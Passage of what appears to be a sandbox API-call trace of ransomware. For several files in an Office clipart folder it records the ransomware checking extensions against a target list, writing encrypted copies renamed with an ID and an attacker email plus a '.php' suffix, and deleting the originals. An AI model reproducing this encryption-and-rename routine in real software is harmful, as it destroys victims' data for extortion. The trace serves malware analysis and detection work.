[0264.006] lstrlenW (lpString=".pdf") returned 4 [0264.006] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0264.006] lstrlenW (lpString=".xls") returned 4 [0264.006] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0264.006] lstrlenW (lpString=".xlsx") returned 5 [0264.006] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0264.006] lstrlenW (lpString=".ppt") returned 4 [0264.006] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0264.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF") returned 63 [0264.006] lstrlenW (lpString=".zip") returned 4 [0264.006] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0264.006] lstrlenW (lpString=".rar") returned 4 [0264.006] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0264.006] lstrlenW (lpString=".bz2") returned 4 [0264.006] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0264.006] lstrlenW (lpString=".7z") returned 3 [0264.006] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0264.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF") returned 63 [0264.006] lstrlenW (lpString=".dbf") returned 4 [0264.006] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0264.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF") returned 63 [0264.006] lstrlenW (lpString=".1cd") returned 4 [0264.006] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0264.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF") returned 63 [0264.006] lstrlenW (lpString=".jpg") returned 4 [0264.006] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0264.007] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF") returned 63 [0264.007] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF") returned 63 [0264.007] lstrlenW (lpString=".doc") returned 4 [0264.007] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0264.007] lstrlenW (lpString=".docx") returned 5 [0264.007] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0264.007] lstrlenW (lpString=".pdf") returned 4 [0264.007] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0264.007] lstrlenW (lpString=".xls") returned 4 [0264.007] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0264.007] lstrlenW (lpString=".xlsx") returned 5 [0264.007] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0264.007] lstrlenW (lpString=".ppt") returned 4 [0264.007] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0264.007] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF") returned 63 [0264.007] lstrlenW (lpString=".zip") returned 4 [0264.007] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0264.007] lstrlenW (lpString=".rar") returned 4 [0264.007] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0264.007] lstrlenW (lpString=".bz2") returned 4 [0264.007] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0264.007] lstrlenW (lpString=".7z") returned 3 [0264.007] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0264.007] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF") returned 63 [0264.007] lstrlenW (lpString=".dbf") returned 4 [0264.007] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0264.007] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF") returned 63 [0264.007] lstrlenW (lpString=".1cd") returned 4 [0264.007] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0264.007] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF") returned 63 [0264.007] lstrlenW (lpString=".jpg") returned 4 [0264.007] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0264.008] lstrcmpiW (lpString1=".WMF", lpString2=".php") returned 1 [0264.008] lstrlenW (lpString="J0152882.WMF") returned 12 [0264.008] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152882.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0264.010] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=9072) returned 1 [0264.010] CloseHandle (hObject=0x318) returned 1 [0264.010] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152882.wmf")) returned 0x20 [0264.010] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152882.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0264.010] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152882.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0264.010] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0264.010] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0264.010] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152882.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0264.011] GetLastError () returned 0x0 [0264.011] ReadFile (in: hFile=0x318, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x2370, lpOverlapped=0x0) returned 1 [0264.084] WriteFile (in: hFile=0x3dc, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x2380, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x2380, lpOverlapped=0x0) returned 1 [0264.086] ReadFile (in: hFile=0x318, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0264.086] WriteFile (in: hFile=0x3dc, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0264.086] SetEndOfFile (hFile=0x3dc) returned 1 [0264.086] CloseHandle (hObject=0x3dc) returned 1 [0264.086] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0264.086] SetEndOfFile (hFile=0x318) returned 1 [0264.088] CloseHandle (hObject=0x318) returned 1 [0264.088] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0264.088] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152882.wmf")) returned 1 [0264.088] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF") returned 63 [0264.088] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF") returned 63 [0264.088] lstrlenW (lpString=".doc") returned 4 [0264.088] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0264.088] lstrlenW (lpString=".docx") returned 5 [0264.088] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0264.088] lstrlenW (lpString=".pdf") returned 4 [0264.088] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0264.088] lstrlenW (lpString=".xls") returned 4 [0264.089] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0264.089] lstrlenW (lpString=".xlsx") returned 5 [0264.089] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0264.089] lstrlenW (lpString=".ppt") returned 4 [0264.089] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0264.089] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF") returned 63 [0264.089] lstrlenW (lpString=".zip") returned 4 [0264.089] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0264.089] lstrlenW (lpString=".rar") returned 4 [0264.089] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0264.089] lstrlenW (lpString=".bz2") returned 4 [0264.089] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0264.089] lstrlenW (lpString=".7z") returned 3 [0264.089] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0264.089] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF") returned 63 [0264.089] lstrlenW (lpString=".dbf") returned 4 [0264.089] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0264.089] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF") returned 63 [0264.089] lstrlenW (lpString=".1cd") returned 4 [0264.089] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0264.089] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF") returned 63 [0264.089] lstrlenW (lpString=".jpg") returned 4 [0264.089] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0264.089] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF") returned 63 [0264.089] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF") returned 63 [0264.089] lstrlenW (lpString=".doc") returned 4 [0264.089] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0264.089] lstrlenW (lpString=".docx") returned 5 [0264.089] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0264.089] lstrlenW (lpString=".pdf") returned 4 [0264.089] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0264.090] lstrlenW (lpString=".xls") returned 4 [0264.090] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0264.090] lstrlenW (lpString=".xlsx") returned 5 [0264.090] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0264.090] lstrlenW (lpString=".ppt") returned 4 [0264.090] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0264.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF") returned 63 [0264.090] lstrlenW (lpString=".zip") returned 4 [0264.090] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0264.090] lstrlenW (lpString=".rar") returned 4 [0264.090] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0264.090] lstrlenW (lpString=".bz2") returned 4 [0264.090] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0264.090] lstrlenW (lpString=".7z") returned 3 [0264.090] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0264.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF") returned 63 [0264.090] lstrlenW (lpString=".dbf") returned 4 [0264.090] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0264.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF") returned 63 [0264.090] lstrlenW (lpString=".1cd") returned 4 [0264.090] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0264.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF") returned 63 [0264.090] lstrlenW (lpString=".jpg") returned 4 [0264.090] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0264.090] lstrcmpiW (lpString1=".WMF", lpString2=".php") returned 1 [0264.090] lstrlenW (lpString="J0152892.WMF") returned 12 [0264.090] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152892.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0264.094] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=10668) returned 1 [0264.094] CloseHandle (hObject=0x3e4) returned 1 [0264.094] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152892.wmf")) returned 0x20 [0264.095] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152892.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0264.095] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152892.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0264.095] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0264.096] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0264.096] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152892.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0264.096] GetLastError () returned 0x0 [0264.096] ReadFile (in: hFile=0x3e4, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x29ac, lpOverlapped=0x0) returned 1 [0264.097] WriteFile (in: hFile=0x3b4, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x29b0, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x29b0, lpOverlapped=0x0) returned 1 [0264.098] ReadFile (in: hFile=0x3e4, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0264.098] WriteFile (in: hFile=0x3b4, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0264.098] SetEndOfFile (hFile=0x3b4) returned 1 [0264.098] CloseHandle (hObject=0x3b4) returned 1 [0264.099] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0264.099] SetEndOfFile (hFile=0x3e4) returned 1 [0264.100] CloseHandle (hObject=0x3e4) returned 1 [0264.101] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0264.101] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152892.wmf")) returned 1 [0264.101] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF") returned 63 [0264.101] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF") returned 63 [0264.101] lstrlenW (lpString=".doc") returned 4 [0264.101] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0264.101] lstrlenW (lpString=".docx") returned 5 [0264.101] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0264.101] lstrlenW (lpString=".pdf") returned 4 [0264.101] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0264.101] lstrlenW (lpString=".xls") returned 4 [0264.101] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0264.101] lstrlenW (lpString=".xlsx") returned 5 [0264.101] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0264.101] lstrlenW (lpString=".ppt") returned 4 [0264.101] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0264.101] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF") returned 63 [0264.101] lstrlenW (lpString=".zip") returned 4 [0264.101] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0264.101] lstrlenW (lpString=".rar") returned 4 [0264.101] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0264.102] lstrlenW (lpString=".bz2") returned 4 [0264.102] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0264.102] lstrlenW (lpString=".7z") returned 3 [0264.102] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0264.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF") returned 63 [0264.102] lstrlenW (lpString=".dbf") returned 4 [0264.102] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0264.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF") returned 63 [0264.102] lstrlenW (lpString=".1cd") returned 4 [0264.102] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0264.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF") returned 63 [0264.102] lstrlenW (lpString=".jpg") returned 4 [0264.102] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0264.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF") returned 63 [0264.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF") returned 63 [0264.102] lstrlenW (lpString=".doc") returned 4 [0264.102] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0264.102] lstrlenW (lpString=".docx") returned 5 [0264.102] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0264.102] lstrlenW (lpString=".pdf") returned 4 [0264.102] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0264.102] lstrlenW (lpString=".xls") returned 4 [0264.102] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0264.102] lstrlenW (lpString=".xlsx") returned 5 [0264.102] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0264.102] lstrlenW (lpString=".ppt") returned 4 [0264.102] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0264.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF") returned 63 [0264.102] lstrlenW (lpString=".zip") returned 4 [0264.102] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0264.102] lstrlenW (lpString=".rar") returned 4 [0264.103] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0264.103] lstrlenW (lpString=".bz2") returned 4 [0264.103] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0264.103] lstrlenW (lpString=".7z") returned 3 [0264.103] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0264.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF") returned 63 [0264.103] lstrlenW (lpString=".dbf") returned 4 [0264.103] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0264.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF") returned 63 [0264.103] lstrlenW (lpString=".1cd") returned 4 [0264.103] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0264.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF") returned 63 [0264.103] lstrlenW (lpString=".jpg") returned 4 [0264.103] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0264.103] lstrcmpiW (lpString1=".WMF", lpString2=".php") returned 1 [0264.103] lstrlenW (lpString="J0152894.WMF") returned 12 [0264.103] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152894.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0264.103] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=11348) returned 1 [0264.103] CloseHandle (hObject=0x3e4) returned 1 [0264.104] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152894.wmf")) returned 0x20 [0264.104] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152894.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0264.104] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152894.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0264.104] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0264.104] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0264.104] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152894.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0264.105] GetLastError () returned 0x0 [0264.105] ReadFile (in: hFile=0x3e4, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x2c54, lpOverlapped=0x0) returned 1 [0264.106] WriteFile (in: hFile=0x3b4, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x2c60, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x2c60, lpOverlapped=0x0) returned 1 [0264.107] ReadFile (in: hFile=0x3e4, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0264.107] WriteFile (in: hFile=0x3b4, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0264.107] SetEndOfFile (hFile=0x3b4) returned 1 [0264.107] CloseHandle (hObject=0x3b4) returned 1 [0264.107] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0264.107] SetEndOfFile (hFile=0x3e4) returned 1 [0264.109] CloseHandle (hObject=0x3e4) returned 1 [0264.110] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0264.110] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152894.wmf")) returned 1 [0264.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF") returned 63 [0264.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF") returned 63 [0264.110] lstrlenW (lpString=".doc") returned 4 [0264.110] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0264.110] lstrlenW (lpString=".docx") returned 5 [0264.110] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0264.110] lstrlenW (lpString=".pdf") returned 4 [0264.110] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0264.110] lstrlenW (lpString=".xls") returned 4 [0264.110] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0264.110] lstrlenW (lpString=".xlsx") returned 5 [0264.110] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0264.110] lstrlenW (lpString=".ppt") returned 4 [0264.110] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0264.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF") returned 63 [0264.110] lstrlenW (lpString=".zip") returned 4 [0264.111] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0264.111] lstrlenW (lpString=".rar") returned 4 [0264.111] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0264.111] lstrlenW (lpString=".bz2") returned 4 [0264.111] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0264.111] lstrlenW (lpString=".7z") returned 3 [0264.111] 